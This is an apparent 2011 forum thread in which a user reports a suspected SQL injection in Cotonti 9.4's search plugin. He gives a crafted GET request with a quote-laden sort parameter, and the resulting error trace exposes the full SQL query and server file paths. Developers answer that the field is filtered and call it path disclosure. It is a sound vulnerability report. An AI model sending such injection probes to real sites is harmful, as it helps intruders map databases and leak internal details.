Search SQL injection

Exploit

Теги: Security

badc0re

#1 18.09.2011 19:14

Members

Hi i want to report a SQL injection.

The request:

Java

        
              GET http://localhost/cotonti/index.php?e=search&sq=%5C'%5C'%5C'%5C'%5C'&rs%5Bsetlimit%5D=0&rs%5Bday%5D=18&rs%5Bmonth%5D=9&rs%5Byear%5D=2010&rs%5Bday%5D=18&rs%5Bmonth%5D=9&rs%5Byear%5D=2011&rs%5Bsetuser%5D=&rs%5Bpagsub%5D%5B%5D=all&rs%5Bpagtitle%5D=1&rs%5Bpagdesc%5D=1&rs%5Bpagtext%5D=1&rs%5Bpagsort%5D=date&rs%5Bpagsort2%5D=ASC&rs%5Bfrmsub%5D%5B%5D=all&rs%5Bfrmtitle%5D=1&rs%5Bfrmtext%5D=1&rs%5Bfrmsort%5D=updated'INJECTED_PARAM'INJECTED_PARAM&rs%5Bfrmsort2%5D=ASC HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://localhost/cotonti/index.php?e=search&sq=%27%27%27%27%27&rs[setlimit]=0&rs[day]=18&rs[month]=9&rs[year]=2010%271%27&rs[day]=18&rs[month]=9&rs[year]=2011&rs[setuser]=&rs[pagsub][]=all&rs[pagtitle]=1&rs[pagdesc]=1&rs[pagtext]=1&rs[pagsort]=date&rs[pagsort2]=ASC&rs[frmsub][]=all&rs[frmtitle]=1&rs[frmtext]=1&rs[frmsort]=updated&rs[frmsort2]=ASC
Cookie: PHPSESSID=bnq658i0omp7t3u654i85llj51
Content-length: 0

Result:

2011-09-18 19:03

Java

        
              Fatal error: SQL error 42S22: Column not found: 1054 Unknown column 'ft_updatedINJECTED_PARAMINJECTED_PARAM' in 'order clause'
 
#0  cot_diefatal(SQL error 42S22: Column not found: 1054 Unknown column 'ft_updatedINJECTED_PARAMINJECTED_PARAM' in 'order clause') called at [D:\xampp2\htdocs\cotonti\system\database.php:436]
#1  CotDB->query(SELECT SQL_CALC_FOUND_ROWS p.*, t.*
                FROM cot_forum_posts AS p, cot_forum_topics AS t
                WHERE t.ft_cat IN ('pub','general','offtopic') AND (t.ft_title LIKE '%\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'%' OR p.fp_text LIKE '%\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'%') AND p.fp_topicid = t.ft_id
                GROUP BY t.ft_id ORDER BY ft_updatedINJECTED_PARAMINJECTED_PARAM ASC
                LIMIT 0, 50) called at [D:\xampp2\htdocs\cotonti\plugins\search\search.php:367]
#2  include(D:\xampp2\htdocs\cotonti\plugins\search\search.php) called at [D:\xampp2\htdocs\cotonti\system\plugin.php:94]
#3  require_once(D:\xampp2\htdocs\cotonti\system\plugin.php) called at [D:\xampp2\htdocs\cotonti\index.php:92]

On version 9.4

esclkm	#2 18.09.2011 19:36
Team Thanked: 76 раз	but where was injection??? this field has ALP filter - which filter only [A-Za-z0-z_] try to inject littledev.ru - мой маленький зарождающийся блог о котонти. снижение стоимости программирования и снижение стоимости производства разные вещи. Первое можно скорее сравнить с раздачей работникам дешевых инструментов, чем со снижением зарплаты

esclkm

#2 18.09.2011 19:36

Team

Thanked:
76 раз

but where was injection??? this field has ALP filter - which filter only [A-Za-z0-z_] try to inject

littledev.ru - мой маленький зарождающийся блог о котонти.
снижение стоимости программирования и снижение стоимости производства разные вещи. Первое можно скорее сравнить с раздачей работникам дешевых инструментов, чем со снижением зарплаты

badc0re	#3 18.09.2011 21:36
Members	#30749 esclkm: but where was injection??? this field has ALP filter - which filter only [A-Za-z0-z_] try to inject Added 2 minutes later: Well the search is vulnerable. Try it by yourself. Maybe it's not exploitable but it could lead to information extraction. Відредаговано: badc0re (18.09.2011 21:46, 14 років тому)

Trustmaster	#4 21.09.2011 07:34
Administrators Thanked: 265 раз	It is more path disclosure than SQL injection, but thank you for the report! May the Source be with you!

badc0re

#5 21.09.2011 10:00

Members

Take a look at

Java

        
              #0  cot_diefatal(SQL error 42S22: Column not found: 1054 Unknown column 'ft_updatedINJECTED_PARAMINJECTED_PARAM' in 'order clause')
 
And
 
GROUP BY t.ft_id ORDER BY ft_updatedINJECTED_PARAMINJECTED_PARAM ASC
 
It looks like sql injection to me.

Trustmaster	#6 21.09.2011 11:45
Administrators Thanked: 265 раз	It's a little harm anyways and it'll be fixed in 0.9.5, thank you once again for the report! May the Source be with you!

badc0re	#7 21.09.2011 13:07
Members	No problem man.

GHengeveld	#8 22.09.2011 17:18
Team Thanked: 52 рази	Actually this isn't really a problem. Production sites should have error reporting disabled, so it won't show the SQL error or backtrace. Nevertheless its good to report these things.